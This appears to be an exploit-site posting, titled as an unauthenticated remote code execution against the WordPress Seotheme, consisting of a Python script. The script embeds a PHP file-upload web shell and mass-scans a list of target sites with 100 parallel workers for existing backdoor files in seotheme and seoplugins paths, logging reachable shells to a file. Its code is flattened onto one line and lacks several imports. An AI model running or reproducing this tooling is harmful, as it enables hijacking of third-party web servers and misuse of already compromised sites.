WordPress Seotheme - Remote Code Execution Unauthenticated (CVE: N/A)

from colorama import Fore
from colorama import init
init(autoreset=True)

fr  =   Fore.RED
fc  =   Fore.CYAN
fw  =   Fore.WHITE
fg  =   Fore.GREEN
fm  =   Fore.MAGENTA

shell = """<?php echo "EX"; echo "
".php_uname()."
"; echo " "; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>""" requests.urllib3.disable_warnings() headers = {'Connection': 'keep-alive',             'Cache-Control': 'max-age=0',             'Upgrade-Insecure-Requests': '1',             'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',             'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',             'Accept-Encoding': 'gzip, deflate',             'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',             'referer': 'www.google.com'} try:     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] except IndexError:     path = str(sys.argv[0]).split('\\')     exit('\n  [!] Enter ') def URLdomain(site):     if site.startswith("http://") :         site = site.replace("http://","")     elif site.startswith("https://") :         site = site.replace("https://","")     else :         pass     pattern = re.compile('(.*)/')     while re.findall(pattern,site):         sitez = re.findall(pattern,site)         site = sitez[0]     return site def FourHundredThree(url):     try:         url = 'http://' + URLdomain(url)         check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)         if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:                 print ' -| ' + url + ' --> {}[Succefully]'.format(fg)                 open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')         else:             url = 'https://' + URLdomain(url)             check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)             if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:                     print ' -| ' + url + ' --> {}[Succefully]'.format(fg)                     open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')             else:                 print ' -| ' + url + ' --> {}[Failed]'.format(fr)                 url = 'http://' + URLdomain(url)         check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)         if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:                 print ' -| ' + url + ' --> {}[Succefully]'.format(fg)                 open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')         else:             url = 'https://' + URLdomain(url)             check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)             if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:                     print ' -| ' + url + ' --> {}[Succefully]'.format(fg)                     open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')             else:                 print ' -| ' + url + ' --> {}[Failed]'.format(fr)     except :         print ' -| ' + url + ' --> {}[Failed]'.format(fr) mp = Pool(100) mp.map(FourHundredThree, target) mp.close() mp.join() print '\n [!] {}Saved in Shells.txt'.format(fc)
magnifiercrosschevron-down